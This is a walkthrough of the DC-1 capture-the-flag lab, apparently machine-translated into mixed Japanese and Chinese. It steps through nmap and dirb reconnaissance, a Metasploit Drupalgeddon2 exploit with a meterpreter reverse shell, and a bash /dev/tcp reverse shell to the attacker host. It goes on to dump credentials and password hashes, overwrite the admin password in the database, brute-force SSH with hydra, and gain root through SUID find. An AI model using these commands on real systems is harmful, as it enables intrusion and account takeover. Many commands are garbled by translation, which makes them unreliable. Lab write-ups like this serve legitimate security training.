DC-1ドローンの練習

DC-1ドローンの練習

最初のステップ：DC-1とカーリーの仮想マシンを構築するために、必要不可欠NATモード

[MKDIR DC-1]
[CD DC-1 /]

ステップ2：スキャンのIPアドレスドローン

[カリ-192.168.139.143 / 24]
[nmapの-sP 192.168.139.0/24 -ON nmap.sp]
[-sP / -snポートスキャンされていない]
[-ON /スキャン結果保存-oX、TXT / XML]

第三段階：情報収集ドローン

【Nmapの-A 192.168.139.145 -p 1-65535 -ON nmap.A]
[フルスキャン-A]
[指定されたポートを-p]

見出さポート80オープン
ポート20オープン-ssh

ステップ4：ログインページ80

【Http://192.168.139.145/】

情報収集のDrupal情報
1 1.php CMSを

ステップ5：スキャンのサブディレクトリ

[dirb-スキャンリスト]
[DIRB http://192.168.139.145/]

ステップ6：Webページの収集情報 - 脆弱性の外観版

[ http://192.168.139.145/UPGRADE.txt ]

[msfconsole]
[msf5 > search drupal]
[ use exploit/unix/webapp/drupal_drupalgeddon2]
[info ]
[set payload 两下tab键 ]
[ ]

[ set payload php/meterpreter/reverse_tcp ]
[show options]
[set RHOSTS 192.168.139.145]
[set LHOST 192.168.139.143 ]
[exploit ]

[成功入侵系统]

第七步：获取falg 1

[meterpreter > cat flag1.txt]
[Every good CMS needs a config file - and so do you.]
[无法使用cat ,提示查看 cms的配置文件]
【cat web.config】–查看网页的信息
[cat sites]
[ls]
[cd default]
[cat settings.php]

第八步:获取falg2

---

meterpreter > cat settings.php
<?php

/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

[shell]
[id]
[netstat -anptl]

利用SSRF漏洞，设置到kali反弹，
kali开启监听端口
[ nc -lvvp 666]

[python -c ‘import pty;pty.spawn("/bin/bash")’ ]
[mysql -udbuser -pR0ck3t]
[exit]
[bash -i >& /dev/tcp/192.168.139.153/666 0>&1]开启反弹

第九步: 通过数据库–获得用户名和密码

[show databases;]
[use drupaldb; ]
[show tables;]
[select * from users\G]

[查出用户名和密码  ]
*************************** 2. row ***************************
             uid: 1
            name: admin
            pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
            mail: [email protected]
           theme:
       signature:
signature_format: NULL
         created: 1550581826
          access: 1550583852
           login: 1550582362
          status: 1
        timezone: Australia/Melbourne
        language:
         picture: 0
            init: [email protected]
            data: b:0;
*************************** 3. row ***************************
             uid: 2
            name: Fred
            pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
            mail: [email protected]
           theme:
       signature:
signature_format: filtered_html
         created: 1550581952
          access: 1550582225
           login: 1550582225
          status: 1
        timezone: Australia/Melbourne
        language:
         picture: 0
            init: [email protected]
            data: b:0;
3 rows in set (0.00 sec)
-----------------------------------

[新生成一条密文—做替换]
[cd …/]
[cd /var/www]
[php scripts/password-hash.sh 123.com]
[password: 123.com hash: $S$DWE/9WSI5iGV2JKCVy7UW7TGEzJ.kNBwVpLcliRiRf9vn1v/SEWq ]

登录数据库—替换密码
[mysql -udbuser -pR0ck3t]
[use drupaldb;]
[update users set pass=“ $S$ SBE / 9WSI5iGV2JKCVy7UW7TGEzJ.kNBwVpLcliRiRf9vn1v /七つの「UID = 1;

ステップ10：Webページ - ログイン管理：123.com- GET FLAG3

ステップセブンイレブン：GET FLAG4
[CAT / etc / passwdファイル]
[ハイドラはFLAG4 -l -P ... / passwd.txt 192.168.139.145 SSH -vV -f -o hydra.ssh]
[SSH [email protected]]

[LS]
[猫FLAG4]

-------------
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?
-------------

十二ステップ：flag5（右提供-root）
思考を- SUID持つが識別コマンドです
[検索/ -4000 -perm 2>を/ dev / null]を
[WCPは、 "/ binに/ SH"を検索-exec;]
[＃ CD /ルート]
[＃のLS]
[＃猫のthefinalflag.txt]は
、最後のバナーを取得します。

--------------------------------------
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#]
--------------------------------------------------